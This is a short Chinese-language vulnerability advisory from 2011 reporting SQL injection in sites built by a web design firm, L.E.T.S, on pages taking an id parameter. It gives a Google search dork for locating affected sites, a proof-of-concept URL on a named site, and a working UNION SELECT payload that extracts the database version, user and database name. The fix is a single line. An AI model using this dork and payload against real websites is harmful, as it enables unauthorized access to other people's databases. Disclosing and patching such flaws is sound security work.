L.E.T.S SQL注入漏洞

发布日期：2011-05.04
发布作者：RoAd_KiLlEr

漏洞类型：SQL注入
漏洞描述：Leading Edge Technology Solutions (L.E.T.S)由于过滤不严，导致sql注入漏洞；L.E.T.S在前沿技术领域的网页设计生长出了灵感的时刻。无论是小企业的创新者或企业家，我们的任务是进行调查和分析市场对特定产品生产的现有数据。成功的商业实体评价竞争对手，目标人口数据，探索从最简单，最安全的方式来证明成功的可靠来源的产品信息。

谷歌关键词：intext:Website By L.E.T.S

漏洞测试：基本上，该系统只要是php?id=的页面都存在sql注入漏洞；

poc：http://www.cnaz.net/testimonial.detail.view.php?ID=[SQL IN]

demo：http://www.cnaz.net/testimonial.detail.view.php?ID=17+and+1=0+Union+select+1,2,@@version,user(),database(),6,7,8,9,10,11,12,13--

漏洞修复：增加sql注入过滤功能，包含到每个文件。
 

标签分类：